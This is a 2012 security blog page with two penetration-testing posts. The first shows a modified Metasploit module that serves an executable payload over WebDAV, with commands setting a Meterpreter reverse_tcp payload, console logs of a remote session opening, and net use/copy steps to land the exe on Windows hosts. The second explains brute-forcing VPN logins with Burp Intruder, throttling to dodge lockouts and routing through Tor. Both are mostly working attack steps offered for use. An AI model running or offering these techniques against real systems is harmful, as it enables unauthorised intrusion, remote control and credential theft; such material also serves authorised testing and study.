carnal0wnage [Shared Reader]

Wednesday, June 6, 2012

WebDAV Server to Download Custom Executable or MSF Generated Executables

Metasploit comes with dllhijacker module

The current module does not allow you to download exe's, in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for.  Anyway, someone asked me if it was  possible to download a file (specifically a pre-generated exe) over WebDAV.  I know an auxiliary module to be a webdav server has been a request for awhile, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.



So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).

The below is a "show options" with nothing set, default is to generate a EXE payload, if you want to set your own local EXE you need to set LOCALEXE to TRUE.

msf  exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  txt              yes       The list of extensions to generate
   LOCALEXE    false            yes       Use a local exe instead of generating one based on payload options
   LOCALFILE   myexe.exe        yes       The filename to serve up
   LOCALROOT   /tmp/            yes       The local file path
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH     /                yes       The URI to use (do not change).


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf  exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>  windows/meterpreter/reverse_tcp
msf  exploit(webdav_file_server) > set LHOST 192.168.26.129
LHOST =>  192.168.26.129
smsf  exploit(webdav_file_server) > set LPORT 5555
LPORT =>  5555

msf  exploit(webdav_file_server) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.26.129:80/
[*] Server started.

msf  exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents
[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17904 PROPFIND /documents/
[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload

**Manually execute the exe**

[*] Sending stage (752128 bytes) to 192.168.26.1
[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012

Now if you want to serve a local exe

msf  exploit(webdav_file_server) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf  exploit(webdav_file_server) > set LOCALEXE TRUE
LOCALEXE => TRUE

msf  exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.


msf  exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents
[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17870 PROPFIND /documents/
[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]

I've tested this on windows 7 and windows XP and I've been told this works with IE7 and below but not IE8. I've just been executing it on the command line.

Usage*:

copy \\ip\documents\myexe.exe myexe.exe

You may have to net use first

net use \\ip\documents\ /User:Guest

You'll see windows attempt the request of SMB, fail, then switch to doing the WebDAV thing.

Once the bin is on the box you can exec the bin manually.

*there are a couple of other ways to run this, the guy that asked me to help with all this will have a post on it soon.

code is HERE in the github repo, be gentle i dont usually do exploit code...

-CG

Tuesday, June 5, 2012

Burp Intruder and Timing Options

Quick post on timing options with Burp Intruder.


Say you need to brute force something.  Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at it to quickly.  That sux.

I regularly use Intruder to do my brute forcing for me, specially since you can add timing options.

You can intercept your request, send to intruder, then add a payload marker for the username (and password if you want to do username/username)
Setting the payload spots

So if you just want to iterate through a list of usernames with the same pass, you just set the pass then go to payloads and add your userlist.  Above, I'm doing username and username as the password and using the pitchfork attack type. ( I think Ken has gone over this in depth, so i'll stop explaining all that unless people ask for it).

Our list of usernames

Once that is set up, you can play with timing options from the options tab.  This will adjust number of threads and how long to wait in between requests.
Timing options

You may also want to send everything through tor. Check the Burp main options tab.

-CG